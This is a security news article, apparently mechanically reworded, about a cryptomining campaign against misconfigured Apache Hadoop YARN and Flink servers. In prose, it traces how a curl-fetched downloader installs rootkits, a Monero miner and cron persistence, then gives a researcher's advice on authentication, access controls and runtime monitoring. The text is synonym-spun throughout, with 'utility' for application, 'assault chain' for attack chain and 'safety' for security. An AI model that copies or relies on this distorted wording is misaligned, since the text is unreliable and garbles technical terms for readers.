From rootkits to cryptomining
Within the assault chain in opposition to Hadoop, the attackers first exploit the misconfiguration to create a brand new utility on the cluster and allocate computing assets to it. Within the utility container configuration, they put a sequence of shell instructions that use the curl command-line software to obtain a binary known as “dca” from an attacker-controlled server contained in the /tmp listing after which execute it. A subsequent request to Hadoop YARN will execute the newly deployed utility and subsequently the shell instructions.
Dca is a Linux-native ELF binary that serves as a malware downloader. Its major objective is to obtain and set up two different rootkits and to drop one other binary file known as tmp on disk. It additionally units a crontab job to execute a script known as dca.sh to make sure persistence on the system. The tmp binary that’s bundled into dca itself is a Monero cryptocurrency mining program, whereas the 2 rootkits, known as initrc.so and pthread.so, are used to cover the dca.sh script and tmp file on disk.
The IP handle that was used to focus on Aqua’s Hadoop honeypot was additionally used to focus on Flink, Redis, and Spring framework honeypots (by way of CVE-2022-22965). This means that the Hadoop assaults are seemingly half of a bigger operation that targets totally different applied sciences, like with TeamTNT’s operations prior to now. When probed by way of Shodan, the IP handle appeared to host an online server with a Java interface named Stage that’s seemingly a part of the Java payload implementation from the Metasploit Framework.
Mitigating the Apache Flink and Hadoop ResourceManager vulnerabilities
“To mitigate vulnerabilities in Apache Flink and Hadoop ResourceManager, particular methods should be applied,” Assaf Morag, a safety researcher at Aqua Safety, tells CSO by way of e mail. “For Apache Flink, it’s essential to safe the file add mechanism. This includes limiting the file add performance to authenticated and approved customers and implementing checks on the forms of recordsdata being uploaded to make sure they’re legit and secure. Measures like file dimension limits and file kind restrictions might be notably efficient.”
In the meantime, Hadoop ResourceManager must have authentication and authorization configured for API entry. Attainable choices embody integration with Kerberos — a standard selection for Hadoop environments — LDAP or different supported enterprise consumer authentication programs.
“Moreover, establishing entry management lists (ACLs) or integrating with role-based entry management (RBAC) programs might be efficient for authorization configuration, a function natively supported by Hadoop for numerous companies and operations,” Morag says. It’s additionally really helpful to contemplate deploying agent-based safety options for containers that monitor the setting and may detect cryptominers, rootkits, obfuscated, or packed binaries and different suspicious runtime behaviors.